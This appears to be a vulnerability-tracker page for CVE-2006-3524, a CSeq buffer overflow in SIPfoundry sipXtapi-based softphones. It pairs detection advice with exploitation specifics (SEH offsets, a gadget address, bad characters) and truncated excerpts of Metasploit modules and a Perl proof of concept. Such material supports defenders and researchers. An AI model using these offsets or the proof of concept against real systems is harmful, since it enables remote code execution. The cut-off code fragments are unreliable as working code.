CVE-2006-3524
published 2006-07-12CVE-2006-3524: Buffer overflow in SIPfoundry sipXtapi released before 20060324 allows remote attackers to execute arbitrary code via a long CSeq field value in an INVITE…
PriorityP355high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
66.99%
99.2th percentile
Buffer overflow in SIPfoundry sipXtapi released before 20060324 allows remote attackers to execute arbitrary code via a long CSeq field value in an INVITE message.
Detection & IOCsextracted from sources · hover to see the quote
commandINVITE sip:<user>@127.0.0.1 SIP/2.0 with oversized CSeq header (260+ bytes, SEH overwrite at offset 252)↗
commandINVITE sip:<user>@127.0.0.1 SIP/2.0 with oversized CSeq header (792+ bytes, SEH overwrite at offset 780)↗
- →Detect oversized SIP CSeq header values in INVITE messages over UDP — the PoC sends a CSeq field exceeding normal numeric bounds with embedded shellcode padding. ↗
- →Alert on SIP INVITE packets arriving on UDP/5060 or UDP/5061 where the CSeq header value is abnormally long (hundreds of bytes rather than a short integer + method string). ↗
- →Bad characters filtered by the exploit payloads are \x00\x0a\x20\x09\x0d — shellcode in the CSeq field will avoid these bytes; use their absence as a heuristic for encoded shellcode in SIP headers. ↗
- →Monitor for the specific CSeq byte pattern from the PoC exploit: hex sequence 31 31 35 37 39 32 30 38 39 32 33 37 33 31 36 31 39 35 34 32 33 35 37 30 followed by a 4-byte EIP overwrite value. ↗
- →Flag presence of coolcore45.dll in process memory of AIM Triton; the SEH overwrite targets a gadget at 0x4017b3d9 within this DLL. ↗
- →SEH-based exploitation: look for structured exception handler overwrites at CSeq buffer offset 252 (sipXezPhone) or offset 780 (AIM Triton) within SIP INVITE traffic. ↗
- ·The sipXezPhone Metasploit module uses a single universal target with a hardcoded SEH gadget; no version-specific offsets are provided, so the same payload is attempted against all 0.35a installs. ↗
- ·The AIM Triton module uses EXITFUNC=seh (not process/thread), meaning the exploit relies on SEH chain walking; detection based purely on process termination may miss successful exploitation. ↗
- ·Payload space is constrained to 400 bytes for both sipXezPhone and AIM Triton modules; staged payloads or large shellcode will not fit and require a stager. ↗
- ·The PoC exploit sends a single UDP datagram with no reliability mechanism; packet loss on the network may cause silent failure with no error indication to the attacker. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SIPfoundry sipXezPhone 0.35a - CSeq Field Overflow (Metasploit)
exploitdb·2010-06-15
CVE-2006-3524 SIPfoundry sipXezPhone 0.35a - CSeq Field Overflow (Metasploit)
SIPfoundry sipXezPhone 0.35a - CSeq Field Overflow (Metasploit)
---
##
# $Id: sipxezphone_cseq.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SIPfoundry sipXezPhone 0.35a CSeq Field Overflow',
'Description' => %q{
This module exploits a buffer overflow in SIPfoundry's
sipXezPhone version 0.35a. By sending an long CSeq header,
a remote attacker could overflow a buffer and execute
arbitrary code on the system with the privileges of
the affected application.
},
'Author' => 'MC',
'Version' => '$Revision: 95
Exploit-DB
AIM Triton 1.0.4 - CSeq Buffer Overflow (Metasploit)
exploitdb·2010-06-15
CVE-2006-3524 AIM Triton 1.0.4 - CSeq Buffer Overflow (Metasploit)
AIM Triton 1.0.4 - CSeq Buffer Overflow (Metasploit)
---
##
# $Id: aim_triton_cseq.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'AIM Triton 1.0.4 CSeq Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in AOL\'s AIM
Triton 1.0.4. By sending an overly long CSeq value,
a remote attacker could overflow a buffer and execute
arbitrary code on the system with the privileges of
the affected application.
},
'Author' => 'MC',
'Version' => '$Revision: 9525 $',
'References' =>
[
['CVE',
Exploit-DB
SIPfoundry sipXphone 2.6.0.27 - CSeq Buffer Overflow (Metasploit)
exploitdb·2010-06-15
CVE-2006-3524 SIPfoundry sipXphone 2.6.0.27 - CSeq Buffer Overflow (Metasploit)
SIPfoundry sipXphone 2.6.0.27 - CSeq Buffer Overflow (Metasploit)
---
##
# $Id: sipxphone_cseq.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in SIPfoundry's
sipXphone 2.6.0.27. By sending an overly long CSeq value,
a remote attacker could overflow a buffer and execute
arbitrary code on the system with the privileges of
the affected application.
},
'Author' => 'MC',
'Version' => '$Revision: 9
Exploit-DB
SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)
exploitdb·2006-07-10
CVE-2006-3524 SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)
SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)
---
#!/usr/bin/perl
# PoC Exploit By [email protected]
# Remote Buffer Overflow in sipXtapi
use IO::Socket;
#use strict;
print "sipXtapi Exploit by Michael Thumann \n\n";
if (not $ARGV[0]) {
print "Usage: sipx.pl \n";
exit;}
$target=$ARGV[0];
my $source ="127.0.0.1";
my $target_port = 5060;
my $user ="bad";
my $eip="\x41\x41\x41\x41";
my $cseq =
"\x31\x31\x35\x37\x39\x32\x30\x38".
"\x39\x32\x33\x37\x33\x31\x36\x31".
"\x39\x35\x34\x32\x33\x35\x37\x30".
$eip;
my $packet =\r
Via: SIP/2.0/UDP $target:3277\r
From: "moz"\r
Call-ID: 3121$target\r
CSeq: $cseq\r
Max-Forwards: 70\r
Contact: \r
\r
END
print "Sending Packet to: " . $target . "\n\n";
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
my $ipaddr = inet_aton($target)
Metasploit
SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow
metasploit
SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow
SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow
This module exploits a buffer overflow in SIPfoundry's sipXphone 2.6.0.27. By sending an overly long CSeq value, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.
Metasploit
SIPfoundry sipXezPhone 0.35a CSeq Field Overflow
metasploit
SIPfoundry sipXezPhone 0.35a CSeq Field Overflow
SIPfoundry sipXezPhone 0.35a CSeq Field Overflow
This module exploits a buffer overflow in SIPfoundry's sipXezPhone version 0.35a. By sending an long CSeq header, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.
Metasploit
AIM Triton 1.0.4 CSeq Buffer Overflow
metasploit
AIM Triton 1.0.4 CSeq Buffer Overflow
AIM Triton 1.0.4 CSeq Buffer Overflow
This module exploits a buffer overflow in AOL\'s AIM Triton 1.0.4. By sending an overly long CSeq value, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2006-July/047757.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2006-July/047794.htmlhttp://secunia.com/advisories/20997http://securitytracker.com/id?1016455http://www.osvdb.org/27122http://www.securityfocus.com/archive/1/439617/100/0/threadedhttp://www.securityfocus.com/archive/1/440135/100/0/threadedhttp://www.securityfocus.com/bid/18906http://www.vupen.com/english/advisories/2006/2735https://exchange.xforce.ibmcloud.com/vulnerabilities/27681http://lists.grok.org.uk/pipermail/full-disclosure/2006-July/047757.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2006-July/047794.htmlhttp://secunia.com/advisories/20997http://securitytracker.com/id?1016455http://www.osvdb.org/27122http://www.securityfocus.com/archive/1/439617/100/0/threadedhttp://www.securityfocus.com/archive/1/440135/100/0/threadedhttp://www.securityfocus.com/bid/18906http://www.vupen.com/english/advisories/2006/2735https://exchange.xforce.ibmcloud.com/vulnerabilities/27681
2006-07-12
Published